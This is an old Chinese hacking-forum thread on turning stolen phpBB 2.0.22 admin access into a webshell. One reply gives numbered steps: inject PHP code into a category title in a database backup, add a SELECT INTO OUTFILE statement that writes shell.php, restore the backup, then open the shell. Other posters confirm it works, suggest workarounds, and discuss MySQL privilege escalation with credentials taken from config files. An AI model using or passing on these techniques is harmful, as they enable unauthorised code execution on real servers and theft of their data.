[讨论]phpBB 2.0.22后台如何拿SHELL?
议题作者:TTFCT [E.S.T]信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
好不容易拿到一个PHPBB论坛的后台,但不知道如何拿SHELL。
下载phpBB 2.0.22,研究了一天,仍然无果。
故前来咨询,会的朋友请说一下.谢谢. 我想问一下我经常在MY。INI里面找到MYSQL的用户名和密码可是提权的时候人家和我要数据库名我却不知道去哪儿找,各位大哥大姐南来的北往的说下谢谢 至尊宝不可能问这种问题的,另外2楼的,数据库名应该也在my.ini下,得到了PHP的webshell在网站目录下的数据库连接文件里找连接mysql的用户名密码,数据库库名应该不是问题,mysql提权不是100%成功的,有限制! mysql提权我没有试过知道 可以说说方法 [quote]引用第4楼狂封异袭于2007-05-20 20:37发表的 :
至尊宝不可能问这种问题的,另外2楼的,数据库名应该也在my.ini下,得到了PHP的webshell在网站目录下的数据库连接文件里找连接mysql的用户名密码,数据库库名应该不是问题,mysql提权不是100%成功的,有限制![/quote]
难道至尊宝会? 我也遇到了PHPBB2.0.22的论坛了
同样在后台拿不到webshell……
继续关注此帖! 1. You need admin rights to upload shell.
2. Before u do something , u must close all ways... To do it , u must put in your browser this line: [url]http://site.com/phpbb/admin/admin_disallow.php?setmodules=00[/url]
3. Now backup the database...
4. Once DB is backuped open it , and find the line: INSERT INTO phpbb_categories u will see something like this: Code:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'TEST Category', '10');
5. Now change it to: Code:
INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? system("ls"); ?>', '10');
6. After , under the line phpbb_categories , write in this : Code:
SELECT cat_title INTO OUTFILE '/home/site//phpbb/cache/shell.php' FROM phpbb_categories where cat_id=1;
7. Now save it , and go back to admin panel , and "Restore Database" !
8. Once u have uploaded the db , go to Code:
[url]http://www.site.com/phpBB/cache/shell.php[/url]
[b]忘记了版本,也没经测试,可做为参考[/b] 楼上说的利用备份还原的办法很巧妙,有待测试
另外phpbb是可以暴出绝对路径的 继续关注. 研究了一晚上也没有头绪~ 确实有待研究 部分论坛可以添加inc后缀上传PHP马可以解释执行
不过局限性太大……不够通用…… 经测试,8楼的方法可行
不过cache目录一般不允许访问
换个可访问上当即可导出webshell
已测试通过! 不过貌似只针对mod版本的才有效
继续期待其它新的方法…… 把一句话插数据库里再恢复确实可行,不过测试的平台是本机架设的,
数据库不大,下载和上传都比较方便,实际上一个论坛的数据库动不动就是几十兆
用这个方法很难实现的,大牛们还有其他的方法没?
另外TTFCT说的在PHPBB后台有个恢复数据库的,有个上传的地方。构建一个上传文件,内容是:
select '<?shell?>' into outfile ' 路径 '
然后上传上去,得到WEBSHELL。
对这个方法不是太理解,测试也不成功,能否在具体指教下 楼上,其实你说的两个方法是同一个方法…… 这么说想拿PHPBB的shell只有这个方法了? 部分目标可以添加inc上传
声明是极少数部分有效……
页:
[1]